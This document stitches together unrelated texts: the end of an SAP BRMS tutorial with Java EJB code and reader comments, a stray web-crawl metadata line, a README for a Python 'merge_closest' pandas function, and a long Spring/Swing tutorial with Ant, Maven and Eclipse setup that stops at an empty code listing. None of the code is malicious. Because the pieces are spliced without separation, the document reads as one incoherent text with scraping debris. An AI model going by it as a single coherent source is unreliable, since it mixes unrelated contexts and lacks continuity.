- On Click of “Next” The pop up changes and looks as shown below. Select the “EnteredPlant” & “ProductCode” from the Available Condition and Add them in the selected Condition. (In our scenario we do not have any horizontal condition or other condition). Click on “Next”.
- On Click of “Next” The pop up changes and looks as shown below. Select the “Plant.setDeliveryPlantList({String})” from the Available Action and Add them in the selected Action. (In our scenario we do not have any other Action). Click on “Finish”.
- On Click Of Finish the “Decision Table” is created and looks as shown below. Add the values in build time or you can add values directly in Rules Manager later on. To know how to click here. (Note : This Upload and download of Decision Table is not available in older version).
- To create a “Rule” we have 2 process to create new “Rule”
- Right Click on “Rules” and select “New Rule…”.
- Open “DeliveryPlantRuleset”. Click on “Rules” Tab. Click on “New” button.
- On selecting either of the method we get the below pop up. Enter the “Rules Name”. Click on “OK”.
- On Click Of “OK” the following is visible. In Our example we only have one rule and one decision table so we set a default condition and a default action as shown in the below.
Step 9 : Enter some dummy values in the Decision Table as shown below. Save it build and deploy “test/ejb/app” & “test/rules” in sequence.
Step 10 : Calling the Rule from “test/ejb/module”.
- Create a Java Class Called “EngineInvoker” and copy past the code in Appendix 1
- Create a “Session Bean” in “test/ejb/module” with the name “DeliveryPlantRules”.
- Copy past the code in Appendix 2 in the “Session Bean” in “test/ejb/module” with the name “DeliveryPlantRules”.
- The Code in line 24 in Appendix 2 is displayed below. there are 3 inputs to the method
- Right Click on the “Session Bean” “DeliveryPlantRules” and Create Web service by following the steps shown in the sequence of screen shot.
Step 11 : Build the dc’s “test/ejb/module” & “test/ejb/app”. Deploy the dc “test/ejb/app“.
Step 12 : Go to http://<Server>:<port>/wsnavigator and test the service be entering the “Plant” & “Product Code” you will get back the Plant DTO with the entered values along with “Delivery Plant”.
Appendix 1 : EngineInvoker.java Class file code.
import java.io.Serializable; import java.util.ArrayList; import java.util.List; import javax.naming.InitialContext; import javax.rmi.PortableRemoteObject; import com.sap.brms.qrules.ejb.RuleEngineHome; import com.sap.brms.qrules.engine.RuleEngine; import com.sap.tc.logging.Location; public class EngineInvoker { static Location logger = Location.getLocation(EngineInvoker.class); private static String jndiName = "com.sap.brms.RuleEngine"; public static RuleEngine getRuleEngine() throws Exception { InitialContext context = new InitialContext(); Object obj = context.lookup(jndiName); RuleEngineHome home = (RuleEngineHome) PortableRemoteObject.narrow(obj,RuleEngineHome.class); return (RuleEngine) home.create(); } @SuppressWarnings("unchecked") public static List<String> invokeRuleset(String projectName, String rsName,List<Serializable> input) { logger.debugT("start:invokeRuleset"); List output = new ArrayList(); RuleEngine ruleEngine; if (projectName == null || rsName == null || input == null) { output.add("Project Name or Ruleset Name or Payload should not be NULL"); } try { ruleEngine = getRuleEngine(); output = ruleEngine.invokeRuleset(projectName, rsName, input); } catch (Exception e) { logger.errorT("error occured:"+e.getMessage()); e.printStackTrace(); } logger.debugT("start:invokeRuleset"); return output; } }
Appendix 2 : DeliveryPlantRules.java Class file code.
import java.io.Serializable; import java.util.ArrayList; import java.util.List; import javax.ejb.Stateless; import util.EngineInvoker; import com.sap.tc.logging.Location; import dto.Plant; @Stateless public class DeliveryPlantRules implements DeliveryPlantRulesLocal { static Location logger = Location.getLocation(DeliveryPlantRules.class); @SuppressWarnings("unchecked") public Plant getDeliveringPlantForProductsRules(Plant plant){ logger.debugT("start:getRullesData"); List<Serializable> ilist = new ArrayList<Serializable>(); ilist.add(plant); Object object = new Object(); if (ilist.size() != 0) { List output = EngineInvoker.invokeRuleset("demo.sap.com~test~rules", "DeliveryPlantRuleset", ilist); if (output.size() != 0) { object = output.get(0); } } else { object = "Input has not been set."; } logger.debugT("end:getRullesData"); if (object instanceof Plant) { return (Plant) object; } return null; } }
Nice Document !!!
Hi Abhijeet,
Thanks & Happy to Help
Nicely Explained !!
Hi Umasankar,
Thanks for appreciating.
Regards
Piyas
Hi Piyas,
Nice & Helpful Doc….
Very Good.
Keep Up the Good Work.
Regards
Avi
Hi Piyas,
Nice document!! Keep up the good work.
Cheers
Adrian
Thanks for the encouragement Adrian
Cheers
Piyas
Hello Piyas,
Nice Document…….Keep up the great work and keep sharing.
Regrds
Kumar D | https://blogs.sap.com/2013/12/27/how-to-consume-or-use-sap-brms-in-ejb-part-1/ | CC-MAIN-2017-30 | refinedweb | 1,330 | 53.98 |
## merge_closest ### Merge column(s) into DataFrame using closest-without-going-over lookup.
The merge_closest function mimics Excel’s VLOOKUP function in approximate match (range lookup) mode, with added benefits of ensuring the lookup table is sorted and merging any subset of columns from the lookup table. It’s similar to a left join based on the lookup_field value that is closest to the data_field value without going over. Only the first matching row from lookup is merged; if lookup_field contains duplicates, it’s up to the user to drop duplicates in advance as appropriate. For any row in data whose data_field value is less than all values in lookup_field, lookup values in result will be missing.
By default, all columns in lookup other than lookup_field will be merged with data. A specific list of columns from lookup to include or exclude can be passed. If both include_cols and exclude_cols are provided, exclude_cols is ignored. To include lookup_field in result, lookup_field must be passed in include_cols, perhaps as include_cols=lookup.columns.
### This is my first Python package and first GitHub repo…
…and any comments or suggestions are most welcome.
### Use
from merge_closest import merge_closest
- merge_closest(data, lookup, data_field, lookup_field,
- include_cols=None, exclude_cols=None, presorted=False)
### Parameters
`data` : pandas DataFrame
`lookup` : pandas DataFrame
`data_field` : name of column in data
`lookup_field` : name of column in lookup
### Returns
`result` : pandas DataFrame. | https://pypi.org/project/merge_closest/ | CC-MAIN-2017-09 | refinedweb | 227 | 51.68 |
Interpolation
To check for maximum bending stress in flat plates — this for a hanger clamp, Roark’s formulas are handy. Here’s a table that offers a recipe.
Manually, this is straightforward: First, I calculate the aspect ratio (a / b) of the flat plate, and then pick a value of β1 that corresponds to the ratio. If I do not find a ready match, then I perform a linear interpolation between the two values that form the intermediate lower and upper boundaries of (a / b).
For example, if my plate size is 200×100, then (a / b) is 2.0 (in the sixth column), whose corresponding β1 would then be equal to 1.226.
But if my plate size is 220×100, then (a / b) becomes 2.2. Now, the nearest lower and upper boundary values in the table are 2.0 and 3.0 respectively. Since Roark’s table does not readily offer a corresponding β1 value, this further requires interpolation — let’s stick to linear, for simplicity.
$$ \frac{p}{q} = \frac{P}{Q} $$
$$ p = \frac{P \cdot q}{Q} $$
$$ = \frac{(2.106 - 1.226) \cdot (2.2 - 2.0)}{(3.0 - 2.0)} $$
$$ \therefore \beta_1 = 1.226 + p $$
How to automate this in python? Here’s one way:
from bisect import bisect # Roark's Table 11.4, Case 10, with three edges fixed # a / b, and b1 are defined as lists below: raob = [0.25, 0.50, 0.75, 1.00, 1.50, 2.00, 3.00] b1 = [0.020, 0.081, 0.173, 0.321, 0.727, 1.226, 2.105] a, b = input("Enter a, b: ") a, b = float(a), float(b) aob = a / b try: i = raob.index(aob) beta1 = b1[i] except ValueError: # aob did not match any value in raob i = bisect(raob, aob) j = i - 1 P = b1[i] - b1[j] q = (aob - raob[j]) Q = (raob[i] - raob[j]) beta1 = b1[j] + (P * q / Q) finally: print "a/b : ", round(aob, 3) print "Index of a/b ratio: ", i print "beta1 : ", round(beta1, 3) pass
And here’s how the above code works:
- First, I import
bisectstandard library for referencing across two lists (
raob, and
b1).
- Get user input for plate size in terms of
a(length) and
b(width).
- Then, in the
trystatement, I attempt to find the index,
i(column number) that matches the aspect ratio (a / b).1 Finding the index is key, which lets me refer to the corresponding value in the second list.
- If an exact numerical match of (a / b) ratio is not found in the
raoblist, then the control jumps to process the
except ValueErrorpart.
- Using
bisect, I try and find the nearest next numerical value and its corresponding index number. So to take the aforementioned example, if my (a / b) ratio turns out to be 2.2, then the next numerical value that bisect finds for me is 3.0, and its corresponding i value, which is 6 in this case.2
- Rest of the code thereafter deals with linear interpolation between two limits (2.0 and 3.0 in this case, and their corresponding β1 values) to get the β1 value (corresponding to 2.2 in this example); and then print those values.
The only shortcut I’ve taken in this crude — doesn’t-catch-all-errors — code yet I think, is in the exception part. I’ve used that to move the control from simply throwing up
ValueError to the next part of the code where the interpolation occurs. (Note: I haven’t addressed the
IndexError that would occur — when the ratio is either lower than 0.25 or greater than 3.0 — in this code.) Until I work out a more elegant way to do the above, this I think will do for now.
For instance, the index of 0.75 in the
raoblist is 2. (Index numbers in python start with 0, not 1.) ↩
For tracing index, and the subsequent interpolation, I preferred using
bisectfrom the standard library (instead of using a custom package like
numpythat comes with better interpolation tools), so I could keep the number of dependencies (and package installation requirements) to a minimum in order to run this code. Without having to resort to using a sledge hammer to kill a mosquito, I’m happy with it so far. ↩ | http://ckunte.net/2011/interpolation | CC-MAIN-2020-05 | refinedweb | 723 | 72.87 |
What Does Internal Rate of Return Mean?
The discount rate often used in capital budgeting that makes the net present value of all cash flows from a particular project equal to zero. Generally, the higher a project's internal rate of return is, the more desirable it is to undertake. Thus, IRR can be used to rank potential projects. Assuming all factors are equal, the project with the highest IRR probably would be considered the best and would be undertaken first. IRR sometimes is referred to as the economic rate of return (ERR).
Investopedia explains Internal Rate of Return
One can think of IRR as the rate of growth a project is expected to generate. Although the actual result may differ from the estimated IRR rate, a project with a substantially higher IRR value than other available options still will provide a much better chance for strong growth. IRRs also can be compared against prevailing rates of return in the securities market. If a firm cannot find any projects with IRRs greater than the returns that can be generated in the financial markets, it may choose to invest its retained earnings in the market.
Related Terms: • Discount Rate • Discounted Cash Flow—DCF• Interest Rate • Modified Internal Rate of Return—MIRR • Present Value Interest Factor—PVIF | http://financial-dictionary.thefreedictionary.com/IRR | crawl-003 | refinedweb | 215 | 60.45 |
Before you start
About this tutorial
This tutorial will help you learn the basics of the Spring framework for application development, using Swing, and dependency injection, also known as Inversion of Control (IOC). After a brief overview of Spring and dependency injection, the bulk of the tutorial is hands-on, walking you step-by-step through creating a fully functional Swing application -- a to-do list program -- using Spring. The walk-through includes three options for a build environment, with detailed setup instructions for each one. You'll learn the basic use and benefits of the Spring framework in the process. Explanations of other relevant concepts are included along the way. You'll also take a few side trips to learn some good programming practices in the context of the tutorial code.
The last section is a brief and high-level review of the Spring Rich Client (RCP) framework, a subproject of the Spring framework that's working to provide a platform for developing rich-client Swing applications under Spring. The tutorial does not include step-by-step instructions for using the Spring RCP but is a starting point for obtaining the source code and exploring the project on your own.
The tutorial shows each new piece of code that you need to type. The complete source code is also available (see Download). The downloadable source code was created by following along and pasting code directly from the tutorial, so it should be bug-free and identical to what you create as you follow along. Because you'll write the GUI application in the Java programming language, it will run on any platform that Java code runs on.
This tutorial is not intended to be a comprehensive overview of the Spring framework or Swing. It does not cover use of Spring to create Web applications or access databases, or more-advanced topics such as Spring's support for aspect-oriented programming (AOP). Explore the tutorial's Resources for books, articles, tutorials, and online references that cover Spring and Swing in greater breadth and detail.
Prerequisites
The audience for this tutorial is Java developers. It is intended to be accessible to multiple experience levels, and even if you are familiar with one topic you might still learn something about another. Some sections discuss related design patterns and development approaches. Feel free to skim past these if you are uninterested or already familiar with them. The following knowledge and skill levels will be helpful:
- Familiarity with the basics of the Java programming language, conventions for Java bean components, and experience with basic application design and development in the Java language.
- Basic knowledge of some build environment -- either Eclipse, Apache Ant, or Apache Maven (see Resources). But even if you are unfamiliar with these environments, you can follow the tutorial's fairly detailed instructions for using them. If you have problems with one, you can try one or both of the other two.
- Basic knowledge of XML syntax -- elements, attributes, and how to maintain a well-formed XML document (see Resources).
- Some basic familiarity with the Swing API, although the tutorial attempts to avoid the use of complex Swing code.
You need a computer with a JDK installed (JDK 1.5 is required to run the Rich Client Project demo in the final section) and an Internet connection for downloading the required tools and libraries.
One of the following is required, or you can use your own build environment or IDE:
- Apache Ant Version 1.6.1 or higher, available at
- Apache Maven Version 1.0.2 or higher, available at
- Eclipse version 3.0, 3.1, or higher, available at
Options for downloading required dependency JARs
In order to minimize the amount of up-front downloading work required to start the tutorial, both the Ant and Maven build scripts in the tutorial's source code provide support for automatically downloading the required dependency JARs (including Spring itself) from public repositories. This feature is built into Maven, and it is provided in the Ant script by the
get-dependencies target. To use these features with Eclipse, you must have Ant or Maven installed. You'll find more details in Environment setup.
You can obtain the correct required JAR versions manually if you prefer. Just refer to the
get-dependencies target in the Ant build.xml file (see Listing 1) to find out which JARs and versions are required, as well as the URLs to download them from.
Overview of Spring and dependency injection
What is the Spring framework?
The Spring framework Web site welcomes visitors with this description: "As the leading full-stack Java/J2EE application framework, Spring delivers significant benefits for many projects, reducing development effort and costs while improving test coverage and quality" (see Resources). This generic statement is an indicator of Spring's scope and size. Simply put, Spring provides many tools and approaches that make it easier to write and test Java and J2EE applications. This tutorial only illustrates basic use of dependency injection, but Spring contains many useful and easy-to-use wrappers for other services and frameworks, as well as advanced features such as support for aspect-oriented programming (AOP) (see Resources).
For more overview and background information on Spring, check out the project's mission statement, The Spring series on developerWorks, and other articles in Resources.
What is dependency injection?
Dependency Injection (DI), also referred to as Inversion of Control (IOC), is an approach to software development in which a separate object or framework (such as the Spring framework) is responsible for creating and "injecting" objects into other objects that depend on them. This results in code that is loosely coupled and easy to test and reuse.
Check out Martin Fowler's site for some good descriptions of DI/IOC (see Resources).
Environment setup
Pick your build environment
Before you start coding the sample application, you need to set up an environment to build and run it. If you are experienced enough with Java programming to handle building and running on your own, you can skip to Creating the to-do list: Basic Swing and Spring application setup.
You have three options to choose from for a build environment (see Prerequisites). You can pick one that you're familiar with or try a new one to get some exposure to it. You can use any one or all three:
- Apache Ant: You can run the Ant build script from the command line (which requires that you download and install Ant) or from within an IDE (such as Eclipse).
- Apache Maven: Maven is a popular build environment. To use it, you must download and install it, but all of the required configuration files to build with Maven are included in the tutorial.
- Eclipse: Note that even if you use Eclipse to build and run, you still need to obtain the library JAR dependencies and then define references to these dependencies in your Eclipse classpath. You can use the Ant or Maven build script to auto-download the required dependencies to your local machine, or download them yourself. You'll find more details in Set up Eclipse.
Set up Ant
If you've chosen Ant as your build environment:
- Install Ant and ensure that the Ant executable is on your path.
- Type
ant -versionat the command line to verify that Ant is installed correctly. Alternatively, you can use Ant from within your IDE of choice or another tool.
- After you've configured Ant in your operating system or IDE, create a directory named todo. This directory will contain all your project files.
- Create the build.xml build script, shown in Listing 1, in the directory's root.
Note: For presentation purposes, some lines in the code listings are split at places where you wouldn't ordinarily split them. In some cases, such as Listing 1, this results in an invalid file that you must fix. In these situations, a NOTE is included inline in the code listing instructing you to delete the note and join the lines together with no spaces. (Ant appears to be smart enough to strip newlines and spaces from URLs, but it's better to make them look nice anyway.)
Listing 1. build.xml
<project name="todo" default="default"> <property name="build.dir" location="build"/> <property name="lib.dir" location="lib"/> <path id="classpath"> <pathelement location="${build.dir}"/> <fileset dir="${lib.dir}"/> </path> <target name="clean"> <delete dir="${build.dir}"/> </target> <target name="get-dependencies"> <mkdir dir="${lib.dir}"/> <get dest="${lib.dir}/commons-logging-1.0.3.jar" usetimestamp="true" ignoreerrors="true" src=" NOTE: The URL in the lines above and below this note was split for readability. Delete this note and join the URL with no spaces commons-logging/jars/commons-logging-1.0.3.jar"/> <get dest="${lib.dir}/spring-1.2.3.jar" usetimestamp="true" ignoreerrors="true" src= " NOTE: The URL in the lines above and below this note was split for readability. Delete this note and join the URL with no spaces springframework/jars/spring-1.2.3.jar"/> </target> <target name="compile"> <mkdir dir="${build.dir}/classes"/> <javac srcdir="src" destdir="${build.dir}/classes" classpathref="classpath" encoding="UTF8" debug="on" deprecation="on" /> <copy todir="${build.dir}/classes" overwrite="true"> <fileset dir="src"> <include name="**/*.xml"/> </fileset> </copy> </target> <target name="run" depends="compile"> <java classname="todo.ToDo" fork="true"> <classpath> <path refid="classpath"/> <pathelement location="${build.dir}/classes"/> </classpath> </java> </target> <target name="default" depends="get-dependencies, compile, run"/> </project>
Automatically downloading dependencies via Ant
Now, run the
get-dependencies target, either by typing
ant get-dependencies on the command line or by running the target in your IDE or editor. You should see output that looks like this:
Buildfile: build.xml get-dependencies: [mkdir] Created dir: D:\projects\todo\lib [get] Getting: maven/commons-logging/jars/commons-logging-1.0.3.jar [get] Getting: springframework/jars/spring-1.2.3.jar BUILD SUCCESSFUL Total time: 30 seconds
You will be instructed to use other targets in the Ant script later in the tutorial. The main ones are
clean,
compile, and
run, which behave like most standard Ant scripts.
Set up Maven
If you've chosen to use Maven as the build environment:
- Install Maven and ensure that the Maven executable is on your path. Refer to the documentation on the Maven site for more details (see Resources).
- Type
maven -vat the command line to show the version and verify that Maven is installed correctly. You can use Maven from within Eclipse via an Eclipse or a Maven plug-in; see the Maven site for details.
- After you've configured Maven in your operating system or IDE, create a directory named todo. This directory will contain all your project files.
- Create the project.xml (see Listing 2) and maven.xml (see Listing 3) Maven configuration files in the todo directory's root.
Listing 2. project.xml
<?xml version="1.0" encoding="UTF-8"?> <project> <pomVersion>3</pomVersion> <id>todo</id> <name>To Do List</name> <currentVersion>1.0</currentVersion> <organization> <name>To Do List Inc.</name> <url></url> <logo></logo> </organization> <inceptionYear>2005</inceptionYear> <package>todo</package> <logo></logo> <description>A To Do List</description> <shortDescription>A To Do List</shortDescription> <url/> <issueTrackingUrl/> <siteAddress/> <siteDirectory/> <distributionDirectory>/notavailable/</distributionDirectory> <repository> <connection/> <url/> </repository> <mailingLists/> <developers/> <dependencies> <dependency> <groupId>springframework</groupId> <artifactId>spring</artifactId> <version>1.2.3</version> </dependency> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1.0.3</version> </dependency> </dependencies> <build> <nagEmailAddress/> <sourceDirectory>src</sourceDirectory> <unitTestSourceDirectory/> <unitTest/> <resources> <resource> <directory>src</directory> <includes> <include>**/*.xml</include> </includes> </resource> </resources> </build> </project>
Listing 3. maven.xml
<project default="test" xmlns: <goal name="run"> <ant:path <ant:pathelement <ant:pathelement <ant:path </ant:path> <attainGoal name="java:compile"/> <attainGoal name="java:jar-resources"/> <ant:java <ant:classpath </ant:java> </goal> </project>
Automatically downloading dependencies via Maven
Now, type
maven at the command line in the root of the todo directory. The output you see should look something like this:
__ __ | \/ |__ _Apache__ ___ | |\/| / _` \ V / -_) ' \ ~ intelligent projects ~ |_| |_\__,_|\_/\___|_||_| v. 1.0.2 Attempting to download spring-1.2.3.jar. 1787K downloaded Attempting to download commons-logging-1.0.3.jar. 30K downloaded build:start: java:prepare-filesystem: java:compile: [echo] Compiling to D:\projects\todo/target/classes [echo] No java source files to compile. java:jar-resources: test:prepare-filesystem: test:test-resources: test:compile: [echo] No test source files to compile. test:test: [echo] No tests to run. BUILD SUCCESSFUL Total time: 35 seconds
Don't worry about the "No tests to run" messages. You are looking for the dependencies to download successfully. Also, be aware that they will download only once, so you won't get the download message on subsequent Maven runs.
You will be instructed to use specific goals in Maven later in the tutorial. The main ones are
clean and
java:compile, which are standard in Maven, and
run, which is a custom goal defined in maven.xml.
Set up Eclipse
This section applies if you've chosen Eclipse as the build environment for the sample application. You'll use Eclipse to create a project, create new files, change perspectives and views, configure your build path, and so on. If you are completely new to Eclipse, I suggest you visit the Eclipse.org main page first to learn the basics of getting around and building projects in Eclipse (see Resources).
First, go to the Java perspective and create a new Java project in your Eclipse workspace named todo. If you already have the todo directory in your workspace (perhaps if you already set up the project for Ant or Maven), you can use the same directory, even though you might get a warning that the location already exists.
After the project is created, you can open the Navigator view (you can't see .* project files in the Package Explorer view) and then create/edit/replace the relevant Eclipse configuration files, shown in Listings 4 through 7. All paths are relative to the todo project root. Usually you wouldn't directly create or edit these files (you would use the menu options in Eclipse), but they are included here for completeness and to reference if you have problems with your Eclipse project setup.
You can overwrite the .project file, shown in Listing 4, or you can use the one that was generated when you created the project:
Listing 4. .project
<?xml version"1.0" encoding="UTF-8"?> <projectDescription> <name>todo</name> <comment></comment> <projects> </projects> <buildSpec> <buildCommand> <name>org.eclipse.jdt.core.javabuilder</name> <arguments> </arguments> </buildCommand> </buildSpec> <natures> <nature>org.eclipse.jdt.core.javanature</nature> </natures> </projectDescription>
The .cvsignore file, shown in Listing 5, is optional, but you'll want to use it if you check your project into a CVS repository:
Listing 5. .cvsignore
target build lib eclipseclasses
Use the version of .classpath in Listing 6 if you want to download your dependencies via Ant or if you have downloaded them yourself and placed them in the lib subdirectory:
Listing 6. .classpath pointing to Ant-downloaded dependencies in lib
<?xml version="1.0" encoding="UTF-8"?> <classpath> <classpathentry kind="src" path="src"/> <classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER"/> <classpathentry kind="lib" path="lib/commons-logging-1.0.3.jar"/> <classpathentry kind="lib" path="lib/spring-1.2.3.jar"/> <classpathentry kind="output" path="eclipseclasses"/> </classpath>
Use the version of .classpath in Listing 7 if you want to download your dependencies via Maven:
Listing 7. .classpath pointing to Maven-downloaded dependencies in MAVEN_REPO
<?xml version="1.0" encoding="UTF-8"?> <classpath> <classpathentry kind="src" path="src"/> <classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER"/> <classpathentry kind="var" path= "MAVEN_REPO/commons-logging/jars/commons-logging-1.0.3.jar"/> <classpathentry kind="var" path="MAVEN_REPO/springframework/jars/spring-1.2.3.jar"/> <classpathentry kind="output" path="eclipseclasses"/> </classpath>
Downloading and defining dependency JARs in the Eclipse classpath
You must download the proper dependency JARs in order to run the sample application under Eclipse. To make this easier, both the Ant and Maven builds described in this section provide a way to download the JARs automatically to a specified location (see Automatically downloading dependencies via Ant and Automatically downloading dependencies via Maven).
To auto-download the dependencies using Ant:
- Have Ant installed.
- Create build.xml (see Listing 1).
- Type
ant get-dependenciesfrom the root of the project.
If you wish to use Maven to auto-download the dependencies:
- Have Maven installed.
- Create project.xml (see Listing 2).
- Type
ant get-dependenciesfrom the root of the project.
If you use the Maven approach, you also need to define an Eclipse classpath variable named
MAVEN_REPO to specify the location of your Maven repository, as shown in Figure 1. (By default, it is in your user home directory.)
Figure 1. Setting an Eclipse classpath variable pointing to MAVEN_REPO
Finally, if you don't want to use Ant or Maven, or the auto-download is not working for some reason, you can manually download the required dependencies and place them in the lib folder. In this case, you would use the .classpath example in Listing 6, which references the JARs in the lib folder.
Also, remember to switch back to the Package Explorer view if you are still on the Navigator view. Working with Java code is easier in the Package Explorer view.
Creating the to-do list: Basic Swing and Spring application setup
In this section, you'll create the basic runnable skeleton of the to-do list application, including Swing and Spring files that you'll build on later in the tutorial. You'll perform a simple example of dependency injection. At the end of the section, you'll have a running application.
Creating the MainFrame, Launcher, and ToDo classes
To start the foundation for the Swing application, you need three parts:
- A class that subclasses the Swing
JFrameclass. All Swing applications must have a main outer frame to contain all other components. You'll call this class
MainFrame.
- A
Launcherclass, responsible for initializing and configuring the Spring framework.
- A class with a
mainmethod, used to launch the application. You'll name this class
ToDo.
You could have combined these three separate classes into one or two classes or inner classes, but it's simpler to keep them separate. Separating them has additional advantages in more-complex applications. For example, during testing, you might want to have a specialized
Launcher class that you can configure and invoke directly from your tests -- perhaps to avoid starting asynchronous tasks that would interfere with testing but are needed during normal application startup.
Listings 8, 9, and 10 show the code for the
MainFrame,
Launcher, and
ToDo classes, respectively. Create a src directory in the project's root. Then create MainFrame.java, Launcher.java, and ToDo.java in the appropriate package structure. (This means that the directory structure under src must match the package name of the class.) Note that MainFrame.java is in the
todo.ui subpackage, where you'll keep the classes related to the user interface.
Listing 8. src/todo/ui/MainFrame.java
package todo.ui; import java.awt.Dimension; import java.awt.Frame; import javax.swing.JFrame; import javax.swing.WindowConstants; public class MainFrame extends JFrame { public void init() { setDefaultCloseOperation(WindowConstants.DISPOSE_ON_CLOSE); setSize(new Dimension(600, 400)); setVisible(true); setState(Frame.NORMAL); show(); } }
The MainFrame class is a pretty straightforward implementation of a Swing JFrame. The code to configure and show the frame is defined in a
public void init() method. This method will be the first method in the application invoked by Spring and the entry point to the Swing application. You'll see how to invoke it in the next panel, Creating the Spring app-context.xml bean definition file.
Listing 9. src/todo/Launcher.java
package todo; import org.springframework.context.support.ClassPathXmlApplicationContext; public class Launcher { public void launch() { String[] contextPaths = new String[] {"todo/app-context.xml"}; new ClassPathXmlApplicationContext(contextPaths); } }
The purpose of the Launcher class is to initialize and launch the Spring framework by creating an ApplicationContext and passing it an array containing the paths to the bean definition file(s) that you'll create in Creating the Spring app-context.xml bean definition file. Spring creates the
MainFrame class automatically when the framework starts up, because the bean will be defined as a Singleton (see Resources). There are several other types of
ApplicationContext implementations besides
ClassPathXmlApplicationContext, but they all serve as a way to provide configuration for a Spring application.
Listing 10. src/todo/ToDo.java
package todo; public class ToDo { public static void main(String[] args) { Launcher launcher = new Launcher(); launcher.launch(); } }
The
ToDo class in Listing 10 simply has a
main method that creates a
Launcher and calls
launch() on it.
After you type these classes in, make sure they compile by using the appropriate method for your build environment:
- Ant: Change to the root directory of the project that contains build.xml. Type
ant compileat the command line, or invoke the
compiletarget from your IDE.
- Maven: Change to the root directory of the project that contains maven.xml. Type
maven java:compileat the command line.
- Eclipse: Choose Build Project, or ensure you have Build Automatically turned on.
You should get a
BUILD SUCCESSFUL message at the command line or no errors for the project in the Eclipse Problems view. If you have any problems, read the compiler error messages carefully. Specifically, make sure you have the required dependency JARs on your classpath. If you don't have them, go back to Environment setup and read how to download the required dependencies automatically.
Note: From this point forward, you will be expected to compile all new files and changes immediately after you make them and to fix any problems that occur. For the sake of brevity, you won't always be explicitly instructed to compile.
Creating the Spring app-context.xml bean definition file
The heart of a Spring project is the bean definition file (or files). This is an XML file that can have any name. You'll call yours app-context.xml and create it in the
todo package, where it will be on the classpath (see Listing 11).
Listing 11. src/todo/app-context.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" ""> <beans> <bean id="mainFrame" class="todo.ui.MainFrame" init- </bean> </beans>
The root element of the bean definition file is
<beans>, which contains
<bean> elements. The
<bean> element provides several attributes, but for your first bean definition you'll use just three: id, class, and init-method. The
id attribute defines the bean's name, which is used to retrieve it from Spring. The
class attribute tells Spring which class to instantiate when it creates the bean. The
init-method attribute defines a method name on the class that will be automatically invoked after Spring instantiates it.
It is important to know that all beans are Singletons by default, unless you specify the singleton="false" attribute on the bean element. Spring automatically instantiates all Singletons when it is first initialized, unless the
lazy-init="true" attribute is specified.
This autocreation of Singletons is the reason why the
Launcher class needs to create only the
ApplicationContext and isn't required to do anything else. Spring simply creates
MainFrame as a Singleton and calls the
init() method on it, which causes it to show itself. Can't wait to try it out? Move on to the next panel, Running the application, for instructions on running your new Spring application.
Running the application
To see your application, follow the instructions for your build environment:
- Ant: Change to the root directory of the project that contains build.xml. Type
ant runor invoke the
runtarget from your IDE.
- Maven: Change to the root directory of the project that contains maven.xml. Type
maven run.
- Eclipse: Run the
ToDoclass as a Java Application (right-click on ToDo.java and select Run As > Java Application).
When you run the application, you should see a blank, gray frame with no title, as shown in Figure 2. If you do, congratulations -- you just ran your first application under Spring!
Figure 2. A blank screen shown by a Swing JFrame, created by Spring
If it doesn't run, look for any exception messages on the console. Spring usually provides straightforward and descriptive error messages and exceptions, so read them carefully. Even if the application runs successfully, you might see some
INFO messages printed to the console, such as "
INFO: Unable to locate MessageSource with name 'messageSource': using default...." Don't worry, these are normal.
Note: From this point forward, the instruction "run the application" means that you should run the appropriate command for your build environment.
Defining bean properties
Now that you have a basic bean being run by Spring, you can try defining some properties for the bean in app-context.xml. You'll start by defining a title for the bean. The
setTitle(String title) accessor method for the frame title is defined on the Frame superclass of your
MainFrame class, so you can use it. Add the new code in Listing 12 to your definition of the
mainFrame bean in app-context.xml. Remember, you already created the src/todo/app-context.xml file, so you only need to add the new lines. From now on, if a code listing is for an existing file, the new (boldfaced) lines will be surrounded by existing lines so you know where to put the new lines.
Listing 12. Defining the bean's title property
<bean id="mainFrame" class="todo.ui.MainFrame" init- <property name="title"> <value>My To Do List</value> </property> </bean>
Run the application, and you should see My To Do List as the title of the frame, as in Figure 3:
Figure 3. Injecting the title text into the JFrame
This was your first simple use of dependency injection. You "injected" a plain
String object into the
title property of your
MainFrame class. Under the covers, Spring is automatically creating a
String with the value
My To Do List and passing that as a parameter to the
setTitle() method of the
todo.ui.MainFrame class. This is an important concept, because all other types of dependency injection in Spring are basically the same. You use the bean definition file(s) to define values, objects, or collections of objects that will be passed (injected) as properties into other objects. Then, Spring wires them together at run time by handling the object creation and property setting for you.
Having the framework do the work of wiring things together is powerful. If you need to change the way that things are wired together in the future, you might only need to change the Spring configuration files and not need to touch your thoroughly tested and bug-free code. Of course, integration problems can always occur when you rewire existing components together in different ways. However, if your components are designed according to good object-oriented principles such as loose coupling and high cohesion (more on this in the next section, Creating the to-do list: Making a reusable component and showing data in a table), you might find that these types of integration problems are relatively rare.
Creating the to-do list: Making a reusable component and showing data in a table
In this section, you'll start fleshing out the application. You won't see any data in your list until the end of the section, but please be patient; you first must create some layout plumbing so you'll have a place to put your data. It will be worth the wait. Also, this section takes some extra time to create a reusable component, show how it can be reused by Spring without changing it, and discuss the benefits of creating reusable components.
Creating a reusable panel
Now, you'll add a panel to the
MainFrame. I'm going to cheat a little bit here and predict the future. I know you'll be reusing this panel, so you'll make it generic enough to be reused. Doing so will let you see later in this section (in Adding a table, and reusing the panel) how easy it is to reuse existing classes in Spring, as long as they are designed with reuse in mind. Usually you'd code a more customized and simple class initially, and then make it more generic for reuse later. (Even then, you'd do so only when you are sure you need to reuse it. See "You Aren't Going To Need It" in Resources.) However, for the purposes of this tutorial, you'll make it reusable from the start keep things simple and save time.
Make a class called
BoxLayoutPanel in the
todo.ui package.
BoxLayoutPanel is a subclass of JPanel and has a BoxLayout (see Listing 13):
Listing 13. src/todo/ui/BoxLayoutPanel.java
